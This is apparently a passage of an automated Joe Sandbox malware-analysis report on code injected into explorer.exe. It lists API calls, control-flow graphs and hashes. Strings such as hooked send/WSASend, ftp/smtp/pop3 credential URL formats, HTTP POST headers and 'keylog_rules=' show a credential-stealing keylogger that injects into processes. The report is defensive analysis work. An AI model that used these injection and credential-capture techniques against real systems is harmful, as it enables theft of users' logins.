                                  • GetCurrentProcessId.KERNEL32(00000003,?,0008109E,?,00081010), ref: 0008135B
                                  • wsprintfA.USER32 ref: 00081372
                                    • Part of subcall function 0008263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0008265A
                                    • Part of subcall function 0008263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00082672
                                    • Part of subcall function 0008263E: lstrlen.KERNEL32(?,00000000), ref: 0008267A
                                    • Part of subcall function 0008263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00082685
                                    • Part of subcall function 0008263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0008269F
                                    • Part of subcall function 0008263E: wsprintfA.USER32 ref: 000826B6
                                    • Part of subcall function 0008263E: CryptDestroyHash.ADVAPI32(?), ref: 000826CF
                                    • Part of subcall function 0008263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 000826D9
                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00081389
                                  • GetLastError.KERNEL32 ref: 0008138F
                                  • Sleep.KERNEL32(000001F4), ref: 000813A1
                                    • Part of subcall function 000824D5: GetCurrentProcessId.KERNEL32 ref: 000824E7
                                    • Part of subcall function 000824D5: GetCurrentThreadId.KERNEL32 ref: 000824EF
                                    • Part of subcall function 000824D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000824FF
                                    • Part of subcall function 000824D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0008250D
                                    • Part of subcall function 000824D5: CloseHandle.KERNEL32(00000000), ref: 00082566
                                  • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 000813B8
                                  • GetProcAddress.KERNEL32(00000000), ref: 000813BF
                                  • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 000813E4
                                  • GetProcAddress.KERNEL32(00000000), ref: 000813EB
                                    • Part of subcall function 00081DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081E1D
                                  • RtlExitUserThread.NTDLL(00000000), ref: 0008141D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                  • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                  • API String ID: 706757162-1430290102
                                  • Opcode ID: 4fec015cbb2ac13bf4a1c12d5512f26f0fe35a9b684991f6ddbd7004c2ccbf0f
                                  • Instruction ID: e1150cd2257c806cacc2476d6baa2bc67bd95f910a78fb5d1cafcba5e1534409
                                  • Opcode Fuzzy Hash: 4fec015cbb2ac13bf4a1c12d5512f26f0fe35a9b684991f6ddbd7004c2ccbf0f
                                  • Instruction Fuzzy Hash: 1D317531340615BBDF107FA0DC1ABDE3B59BF95F41F005014FAC69A292CF799A528BA1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 235 81647-8165a 236 81748-8174f 235->236 237 81660-81662 235->237 237->236 238 81668-8166b 237->238 238->236 239 81671-8167d lstrlen 238->239 240 81683-8168a lstrlen 239->240 241 81747 239->241 240->241 242 81690-816a8 getpeername 240->242 241->236 242->241 243 816ae-816ca inet_ntoa htons 242->243 243->241 244 816cc-816d4 243->244 245 81708 244->245 246 816d6-816d9 244->246 249 8170d-8173c call 82861 wsprintfA call 824ae 245->249 247 816db-816de 246->247 248 816f3-816f8 246->248 250 816e0-816e3 247->250 251 81701-81706 247->251 248->249 249->241 259 8173e-81745 call 82843 249->259 254 816fa-816ff 250->254 255 816e5-816ea 250->255 251->249 254->249 255->248 257 816ec-816f1 255->257 257->241 257->248 259->241
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                  • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                  • API String ID: 3379139566-1703351401
                                  • Opcode ID: 03f0530a0a7ee1c63c3f1577a01795ef3f55d768128e7972553bc29af73dd61b
                                  • Instruction ID: d5608456101c3c778587acf2e152922007bce819ecc53712541b90b68493945c
                                  • Opcode Fuzzy Hash: 03f0530a0a7ee1c63c3f1577a01795ef3f55d768128e7972553bc29af73dd61b
                                  • Instruction Fuzzy Hash: 97219236E04209ABAF517EA9CD885FE7AFDBF85701F084179E9C4D3211DA34CE129B64

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 267 81752-81774 GetModuleHandleA GetProcAddress 268 817c1-817c6 267->268 269 81776-817c0 RtlZeroMemory * 4 267->269 269->268
                                  APIs
                                  • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00081539,?,?,?,0008144B,?), ref: 00081763
                                  • GetProcAddress.KERNEL32(00000000,?,00081539,?,?,?,0008144B,?), ref: 0008176A
                                  • RtlZeroMemory.NTDLL(00084228,00000104), ref: 00081788
                                  • RtlZeroMemory.NTDLL(00084118,00000104), ref: 00081790
                                  • RtlZeroMemory.NTDLL(00084330,00000104), ref: 00081798
                                  • RtlZeroMemory.NTDLL(00084000,00000104), ref: 000817A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MemoryZero$AddressHandleModuleProc
                                  • String ID: %s%s%s%s$ntdll.dll$sscanf
                                  • API String ID: 1490332519-278825019
                                  • Opcode ID: 0d8de067e37a3c8e510e18b4f3f54e50335b4ff64490c8f9c8ca228bf60caefa
                                  • Instruction ID: 530bc9f54433c06892bab1a68e75f7d045b8179b057df917c1f81b95164fa071
                                  • Opcode Fuzzy Hash: 0d8de067e37a3c8e510e18b4f3f54e50335b4ff64490c8f9c8ca228bf60caefa
                                  • Instruction Fuzzy Hash: 29F0823278032D33852032EABC0AD4BBE5CFBD1FA63420161B7C4AB281D8996A004BF4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 271 824d5-82513 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 272 82561-82563 271->272 273 82515-82519 272->273 274 82565-82572 CloseHandle 272->274 275 8251b-8251f 273->275 276 82555-8255b Thread32Next 273->276 275->276 277 82521-8253a OpenThread 275->277 276->272 278 8253c-82542 SuspendThread 277->278 279 82544 ResumeThread 277->279 280 8254a-82551 CloseHandle 278->280 279->280 280->276
                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 000824E7
                                  • GetCurrentThreadId.KERNEL32 ref: 000824EF
                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000824FF
                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 0008250D
                                  • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008252C
                                  • SuspendThread.KERNEL32(00000000), ref: 0008253C
                                  • CloseHandle.KERNEL32(00000000), ref: 0008254B
                                  • Thread32Next.KERNEL32(00000000,0000001C), ref: 0008255B
                                  • CloseHandle.KERNEL32(00000000), ref: 00082566
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                  • String ID:
                                  • API String ID: 1467098526-0
                                  • Opcode ID: 13e0c775c2527d4a5f09ea347ca2aaf5247988b557232a428c51b9325d28ed3b
                                  • Instruction ID: fb39f373af59805266f910fafb1a5732cded0f9030e1640caf296d2c8af7054c
                                  • Opcode Fuzzy Hash: 13e0c775c2527d4a5f09ea347ca2aaf5247988b557232a428c51b9325d28ed3b
                                  • Instruction Fuzzy Hash: B9118EB1044700EFE710AF60AC2CB6EBBA8FFC5B01F000529FAC192150D7399A498FA7

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 281 81f4a-81fa5 call 822b8 call 82861 call 827e2 call 82374 290 81fc0-81fcc 281->290 291 81fa7-81fbe 281->291 294 81fd0-81fd2 290->294 291->294 295 81fd8-8200f RtlZeroMemory 294->295 296 822a6-822b5 call 82843 294->296 300 8229e-822a5 295->300 301 82015-82030 295->301 300->296 302 82062-82074 301->302 303 82032-82043 call 822e5 301->303 308 82078-8207a 302->308 309 82045-82054 303->309 310 82056 303->310 312 8228b-82291 308->312 313 82080-820dc call 82731 308->313 311 82058-82060 309->311 310->311 311->308 314 8229a 312->314 315 82293-82295 call 82843 312->315 321 820e2-820e7 313->321 322 82284 313->322 314->300 315->314 323 820e9-820fa 321->323 324 82101-8212f call 82861 wsprintfW 321->324 322->312 323->324 327 82148-8215f 324->327 328 82131-82133 324->328 334 8219e-821b8 327->334 335 82161-82197 call 82861 wsprintfW 327->335 329 82134-82137 328->329 330 82139-8213e 329->330 331 82142-82144 329->331 330->329 333 82140 330->333 331->327 333->327 339 821be-821d1 334->339 340 82261-82277 call 82843 334->340 335->334 339->340 343 821d7-821ed call 82861 339->343 348 82279-8227b call 82843 340->348 349 82280 340->349 350 821ef-821fa 343->350 348->349 349->322 352 821fc-82209 call 82826 350->352 353 8220e-82225 350->353 352->353 357 82229-82236 353->357 358 82227 353->358 357->350 359 82238-8223c 357->359 358->357 360 8223e 359->360 361 82256-8225d call 82843 359->361 362 8223e call 82815 360->362 361->340 364 82243-82250 RtlMoveMemory 362->364 364->361
                                  APIs
                                    • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                    • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                    • Part of subcall function 000827E2: lstrlen.KERNEL32(000840DA,?,00000000,00000000,00081F86,75712B62,000840DA,00000000), ref: 000827EA
                                    • Part of subcall function 000827E2: MultiByteToWideChar.KERNEL32(00000000,00000000,000840DA,00000001,00000000,00000000), ref: 000827FC
                                    • Part of subcall function 00082374: RtlZeroMemory.NTDLL(?,00000018), ref: 00082386
                                  • RtlZeroMemory.NTDLL(?,0000003C), ref: 00081FE2
                                  • wsprintfW.USER32 ref: 0008211B
                                  • wsprintfW.USER32 ref: 00082186
                                  • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00082250
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                  • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                  • API String ID: 4204651544-1701262698
                                  • Opcode ID: e48be7de1766242c5f44ab3653c0dcb4d8e3a1e436a386c2fadcbc51b9c6efee
                                  • Instruction ID: 255fa56fcf304d2d87e24e71b666508560c75d90a8d3bc13f7fa8d1b7e7ffd1a
                                  • Opcode Fuzzy Hash: e48be7de1766242c5f44ab3653c0dcb4d8e3a1e436a386c2fadcbc51b9c6efee
                                  • Instruction Fuzzy Hash: A9A17E71609305AFD750EFA8C885A6BBBE8FF88740F10092DF9C5D7252DA74DE048B52

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 366 825ad-825c9 OpenProcess 367 825cb-825da IsWow64Process 366->367 368 82600-82607 366->368 369 825dc-825ec IsWow64Process 367->369 370 825f7 367->370 371 825f9-825fa CloseHandle 369->371 372 825ee-825f5 369->372 370->371 371->368 372->371
                                  APIs
                                  • OpenProcess.KERNEL32(00000400,00000000,?,756F3E2E,?,?,microsoftedgecp.exe,00081287), ref: 000825BF
                                  • IsWow64Process.KERNEL32(000000FF,?), ref: 000825D1
                                  • IsWow64Process.KERNEL32(00000000,?), ref: 000825E4
                                  • CloseHandle.KERNEL32(00000000), ref: 000825FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Wow64$CloseHandleOpen
                                  • String ID: microsoftedgecp.exe
                                  • API String ID: 331459951-1475183003
                                  • Opcode ID: 600cb7db61868d3c752ed1014d4c81f2ed1500a3007f689a1d6809e9e32329e4
                                  • Instruction ID: 3f0c6239a235d8a9353f50cbffe2d8c9637570955e109b19aea4602d3b8e1d07
                                  • Opcode Fuzzy Hash: 600cb7db61868d3c752ed1014d4c81f2ed1500a3007f689a1d6809e9e32329e4
                                  • Instruction Fuzzy Hash: C8F03071942A18FFAB10DF949E988EE77ACFB01655B14026AF954A2140DB354F04EBA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 421 81b17-81b2c 422 81b2e 421->422 423 81b60-81b68 421->423 424 81b30-81b5e RtlMoveMemory 422->424 425 81b6a-81b6f 423->425 426 81bc3-81bcb 423->426 424->423 424->424 429 81bbe-81bc1 425->429 427 81c0b 426->427 428 81bcd-81bdf 426->428 432 81c0d-81c12 427->432 428->427 431 81be1-81bfe LdrProcessRelocationBlock 428->431 429->426 430 81b71-81b84 LoadLibraryA 429->430 434 81b8a-81b8f 430->434 435 81c15-81c17 430->435 431->427 433 81c00-81c04 431->433 433->427 436 81c06-81c09 433->436 437 81bb6-81bb9 434->437 435->432 436->427 436->431 438 81bbb 437->438 439 81b91-81b95 437->439 438->429 440 81b9c-81b9f 439->440 441 81b97-81b9a 439->441 442 81ba1-81bab GetProcAddress 440->442 441->442 442->435 443 81bad-81bb3 442->443 443->437
                                  APIs
                                  • RtlMoveMemory.NTDLL(?,?,?), ref: 00081B4E
                                  • LoadLibraryA.KERNEL32(?), ref: 00081B76
                                  • GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 00081BA3
                                  • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081BF4
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                  • String ID:
                                  • API String ID: 3827878703-0
                                  • Opcode ID: deeee95f3bd46ff30e3176e8a61dc90dd6eea73f4c86b4a940bb470ff21184f1
                                  • Instruction ID: 31b629b9df2a73af95de90739bfef73f464a0266a5217f3dfc158e275eeba735
                                  • Opcode Fuzzy Hash: deeee95f3bd46ff30e3176e8a61dc90dd6eea73f4c86b4a940bb470ff21184f1
                                  • Instruction Fuzzy Hash: 5A31AC75700612ABCB68DF29C894BA6B7ECBF15315B14456CE8C6CB200E735E846CBA0

                                  Execution Graph

                                  Execution Coverage:8.7%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:9
                                  Total number of Limit Nodes:2
                                  execution_graph 764 69fab 765 6a1f3 764->765 766 69fd8 764->766 769 6a048 766->769 770 6a04d 769->770 771 6a135 LoadLibraryA 770->771 772 6a190 VirtualProtect VirtualProtect 770->772 774 69ff8 770->774 771->770 773 6a1e8 772->773 773->773

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00061A04 1 Function_00061405 2 Function_00061000 3 Function_00062E80 4 Function_0006188C 27 Function_00061838 4->27 5 Function_0006A00A 6 Function_00063088 14 Function_00062E98 6->14 52 Function_00061B70 6->52 7 Function_00062E08 15 Function_00062418 7->15 39 Function_00061D50 7->39 44 Function_00061860 7->44 48 Function_000618E8 7->48 8 Function_00062508 30 Function_000625C4 8->30 40 Function_000618D0 8->40 43 Function_000624E0 8->43 9 Function_00061C08 10 Function_00061A88 11 Function_00061508 12 Function_00062010 12->0 13 Function_0006141D 14->0 14->7 29 Function_00062CB8 14->29 37 Function_00061DD4 14->37 51 Function_00062BF4 14->51 54 Function_00062B70 14->54 15->27 38 Function_00062054 15->38 15->44 16 Function_000645A7 17 Function_0006B124 18 Function_00061822 19 Function_00063020 19->14 19->52 20 Function_00061D20 21 Function_00062620 22 Function_00063220 22->9 24 Function_00061C28 22->24 26 Function_00061BB0 22->26 22->27 28 Function_00061938 22->28 46 Function_00062860 22->46 22->52 23 Function_00069FAB 33 Function_0006A048 23->33 25 Function_000614B2 29->20 29->27 29->44 56 Function_000625FC 30->56 31 Function_00061F40 31->27 57 Function_000618F8 31->57 32 Function_00064A41 33->5 34 Function_000641C9 35 Function_00061254 36 Function_000614D4 37->27 38->4 38->12 38->27 38->28 38->31 38->40 38->44 53 Function_00061E70 38->53 38->57 39->27 41 Function_0006355C 41->22 41->27 41->41 41->52 55 Function_000630F0 41->55 42 Function_00061C58 44->52 45 Function_00061560 46->21 50 Function_00062774 46->50 46->52 47 Function_0006156C 49 Function_00061576 54->0 54->27 55->8 55->10 55->27 55->42 55->44 58 Function_000614F9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 118 6355c-6356c call 61b70 121 63572-635a5 call 61838 118->121 122 635fc-63601 118->122 126 635a7 call 61838 121->126 127 635d1-635f6 NtUnmapViewOfSection 121->127 129 635ac-635c5 126->129 131 63608-63617 call 63220 127->131 132 635f8-635fa 127->132 129->127 137 63621-6362a 131->137 138 63619-6361c call 6355c 131->138 132->122 133 63602-63607 call 630f0 132->133 133->131 138->137
                                  APIs
                                  • NtUnmapViewOfSection.NTDLL ref: 000635D8
                                  Memory Dump Source
                                  • Source File: 0000001C.00000002.617958525.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_28_2_61000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SectionUnmapView
                                  • String ID:
                                  • API String ID: 498011366-0
                                  • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                  • Instruction ID: a7e1edf78df86a80834df86f870b15e34a0a18ae6f39641b0afaeab6d9e318a2
                                  • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                  • Instruction Fuzzy Hash: 97119430615E095FFB5CBBB898AD2B937E2EB54301F54412AA81AC76A2DF398A40C741

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 63220-6325b call 61838 3 63261-63273 CreateToolhelp32Snapshot 0->3 4 63549-63554 SleepEx 3->4 5 63279-6328f Process32First 3->5 4->3 6 63538-6353a 5->6 7 63294-632ac lstrcmpi 6->7 8 63540-63543 CloseHandle 6->8 9 632b2-632c6 7->9 10 6348c-63495 call 61bb0 7->10 8->4 9->10 16 632cc-632e0 9->16 14 6352a-63532 Process32Next 10->14 15 6349b-634a4 call 61c08 10->15 14->6 15->14 20 634aa-634b1 call 61c28 15->20 16->10 21 632e6-632fa 16->21 20->14 26 634b3-634c1 call 61b70 20->26 21->10 25 63300-63314 21->25 25->10 30 6331a-6332e 25->30 26->14 31 634c3-63525 call 61938 call 62860 call 61938 26->31 30->10 34 63334-63348 30->34 31->14 34->10 40 6334e-63362 34->40 40->10 43 63368-6337c 40->43 43->10 45 63382-63396 43->45 45->10 47 6339c-633b0 45->47 47->10 49 633b6-633ca 47->49 49->10 51 633d0-633e4 49->51 51->10 53 633ea-633fe 51->53 53->10 55 63404-63418 53->55 55->10 57 6341a-6342e 55->57 57->10 59 63430-63444 57->59 59->10 61 63446-6345a 59->61 61->10 63 6345c-63470 61->63 63->10 65 63472-63486 63->65 65->10 65->14
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001C.00000002.617958525.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_28_2_61000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32lstrcmpi
                                  • String ID:
                                  • API String ID: 1122579583-0
                                  • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                  • Instruction ID: 28e577ad9dc82d99a2c89217d31615d83bbaf6f9860ed4cfdaa8213d510eb323
                                  • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                  • Instruction Fuzzy Hash: 42812131218A088FE756EF54E858BEAB7E2FB51741F44471AA453C71A0EF78EA04CBC1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 67 6a048-6a04b 68 6a055-6a059 67->68 69 6a065 68->69 70 6a05b-6a063 68->70 71 6a067 69->71 72 6a04d-6a053 69->72 70->69 73 6a06a-6a071 71->73 72->68 75 6a073-6a07b 73->75 76 6a07d 73->76 75->76 76->73 77 6a07f-6a082 76->77 78 6a097-6a0a4 77->78 79 6a084-6a092 77->79 91 6a0a6-6a0a8 78->91 92 6a0be-6a0cc call 6a00a 78->92 80 6a094-6a095 79->80 81 6a0ce-6a0e9 79->81 80->78 82 6a11a-6a11d 81->82 84 6a122-6a129 82->84 85 6a11f-6a120 82->85 87 6a12f-6a133 84->87 86 6a101-6a105 85->86 89 6a107-6a10a 86->89 90 6a0eb-6a0ee 86->90 93 6a135-6a14e LoadLibraryA 87->93 94 6a190-6a1e4 VirtualProtect * 2 87->94 89->84 95 6a10c-6a110 89->95 90->84 100 6a0f0 90->100 96 6a0ab-6a0b2 91->96 92->68 99 6a14f-6a156 93->99 97 6a1e8-6a1ed 94->97 101 6a112-6a119 95->101 102 6a0f1-6a0f5 95->102 111 6a0b4-6a0ba 96->111 112 6a0bc 96->112 97->97 103 6a1ef-6a1fe 97->103 99->87 105 6a158 99->105 100->102 101->82 102->86 110 6a0f7-6a0f9 102->110 108 6a164-6a16c 105->108 109 6a15a-6a162 105->109 113 6a16e-6a17a 108->113 109->113 110->86 114 6a0fb-6a0ff 110->114 111->112 112->92 112->96 116 6a185-6a18f 113->116 117 6a17c-6a183 113->117 114->86 114->89 117->99
                                  APIs
                                  • LoadLibraryA.KERNEL32 ref: 0006A147
                                  • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0006A1BB
                                  • VirtualProtect.KERNELBASE ref: 0006A1D9
                                  Memory Dump Source
                                  • Source File: 0000001C.00000002.617958525.0000000000067000.00000040.80000000.00040000.00000000.sdmp, Offset: 00067000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_28_2_67000_explorer.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual$LibraryLoad
                                  • String ID:
                                  • API String ID: 895956442-0
                                  • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                  • Instruction ID: cdcb3d13d9fcc50474130bbeb187b8e8950aabbb2f1cede5e515d202ea7ed807
                                  • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                  • Instruction Fuzzy Hash: A151993135891D0ADB24BA3C9CC47B9B3C3E75B325F18062AC48AD7285D919D8868B83

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00081E89 18 Function_00082724 0->18 37 Function_00081ED8 0->37 43 Function_00081FEA 0->43 1 Function_00082A09 2 Function_0008298A 3 Function_0008200D 3->1 17 Function_000820A1 3->17 44 Function_000829EB 3->44 4 Function_0008288D 5 Function_0008268F 6 Function_0008240F 36 Function_00082841 6->36 7 Function_00081000 10 Function_00081016 7->10 8 Function_00081581 8->1 8->18 24 Function_000816B9 8->24 29 Function_0008293E 8->29 8->44 9 Function_00082799 10->1 10->4 10->5 14 Function_000812AE 10->14 15 Function_000826AE 10->15 16 Function_000813AE 10->16 10->18 20 Function_000810A5 10->20 30 Function_000818BF 10->30 34 Function_000826C9 10->34 10->36 38 Function_0008275A 10->38 10->44 45 Function_0008276D 10->45 11 Function_0008162B 11->24 12 Function_0008182D 12->1 12->3 13 Function_000829AE 12->13 19 Function_000825A4 12->19 12->44 14->1 14->13 26 Function_000829BD 14->26 14->36 39 Function_0008255C 14->39 41 Function_00082569 14->41 14->44 16->0 16->1 16->9 25 Function_00081F3A 16->25 16->44 48 Function_000825F1 16->48 17->1 17->2 17->4 17->6 17->26 28 Function_0008243D 17->28 35 Function_000824CC 17->35 17->44 19->1 20->1 20->4 20->5 20->14 20->15 20->18 20->30 20->34 20->36 20->38 20->44 20->45 21 Function_00081E26 31 Function_00081CBF 21->31 22 Function_00081B26 23 Function_00083627 40 Function_000817DC 24->40 24->44 25->26 33 Function_00081FB4 25->33 25->43 47 Function_00081E66 25->47 27 Function_00081BBD 28->1 28->2 29->1 29->44 30->18 30->22 30->27 32 Function_00081533 33->21 40->1 42 Function_000829E9 44->18 46 Function_00089AE0 47->31

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00082724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000829F3,-00000001,0008128C), ref: 00082731
                                    • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                    • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                  • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00081038
                                  • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008106C
                                  • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081075
                                  • GetCurrentProcessId.KERNEL32(?,00081010), ref: 0008107B
                                  • wsprintfA.USER32 ref: 000810E7
                                  • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00081155
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081160
                                  • Process32First.KERNEL32(00000000,?), ref: 0008117F
                                  • CharLowerA.USER32(?), ref: 00081199
                                  • lstrcmpi.KERNEL32(?,explorer.exe), ref: 000811B5
                                  • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081212
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0008126C
                                  • CloseHandle.KERNELBASE(00000000), ref: 0008127F
                                  • Sleep.KERNELBASE(000003E8), ref: 0008129F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                  • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                  • API String ID: 3206029838-2805246637
                                  • Opcode ID: 90536ab19f4f6bce970e7a6ad40275f1c3b84ea01975481b8196837e06f2b1ed
                                  • Instruction ID: c891c7935db4289d37885e744c3d10944dcfcb3c9ed39a47a4427c91ed757d4e
                                  • Opcode Fuzzy Hash: 90536ab19f4f6bce970e7a6ad40275f1c3b84ea01975481b8196837e06f2b1ed
                                  • Instruction Fuzzy Hash: 2251C5302047019BD714BF74DC599BA77EDFF84B41F040528F9D6972A2EA389A468F62

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                    • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                  • wsprintfA.USER32 ref: 000810E7
                                    • Part of subcall function 0008276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00082777
                                    • Part of subcall function 0008276D: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000810FE), ref: 00082789
                                  • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00081155
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081160
                                  • Process32First.KERNEL32(00000000,?), ref: 0008117F
                                  • CharLowerA.USER32(?), ref: 00081199
                                  • lstrcmpi.KERNEL32(?,explorer.exe), ref: 000811B5
                                  • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081212
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0008126C
                                  • CloseHandle.KERNELBASE(00000000), ref: 0008127F
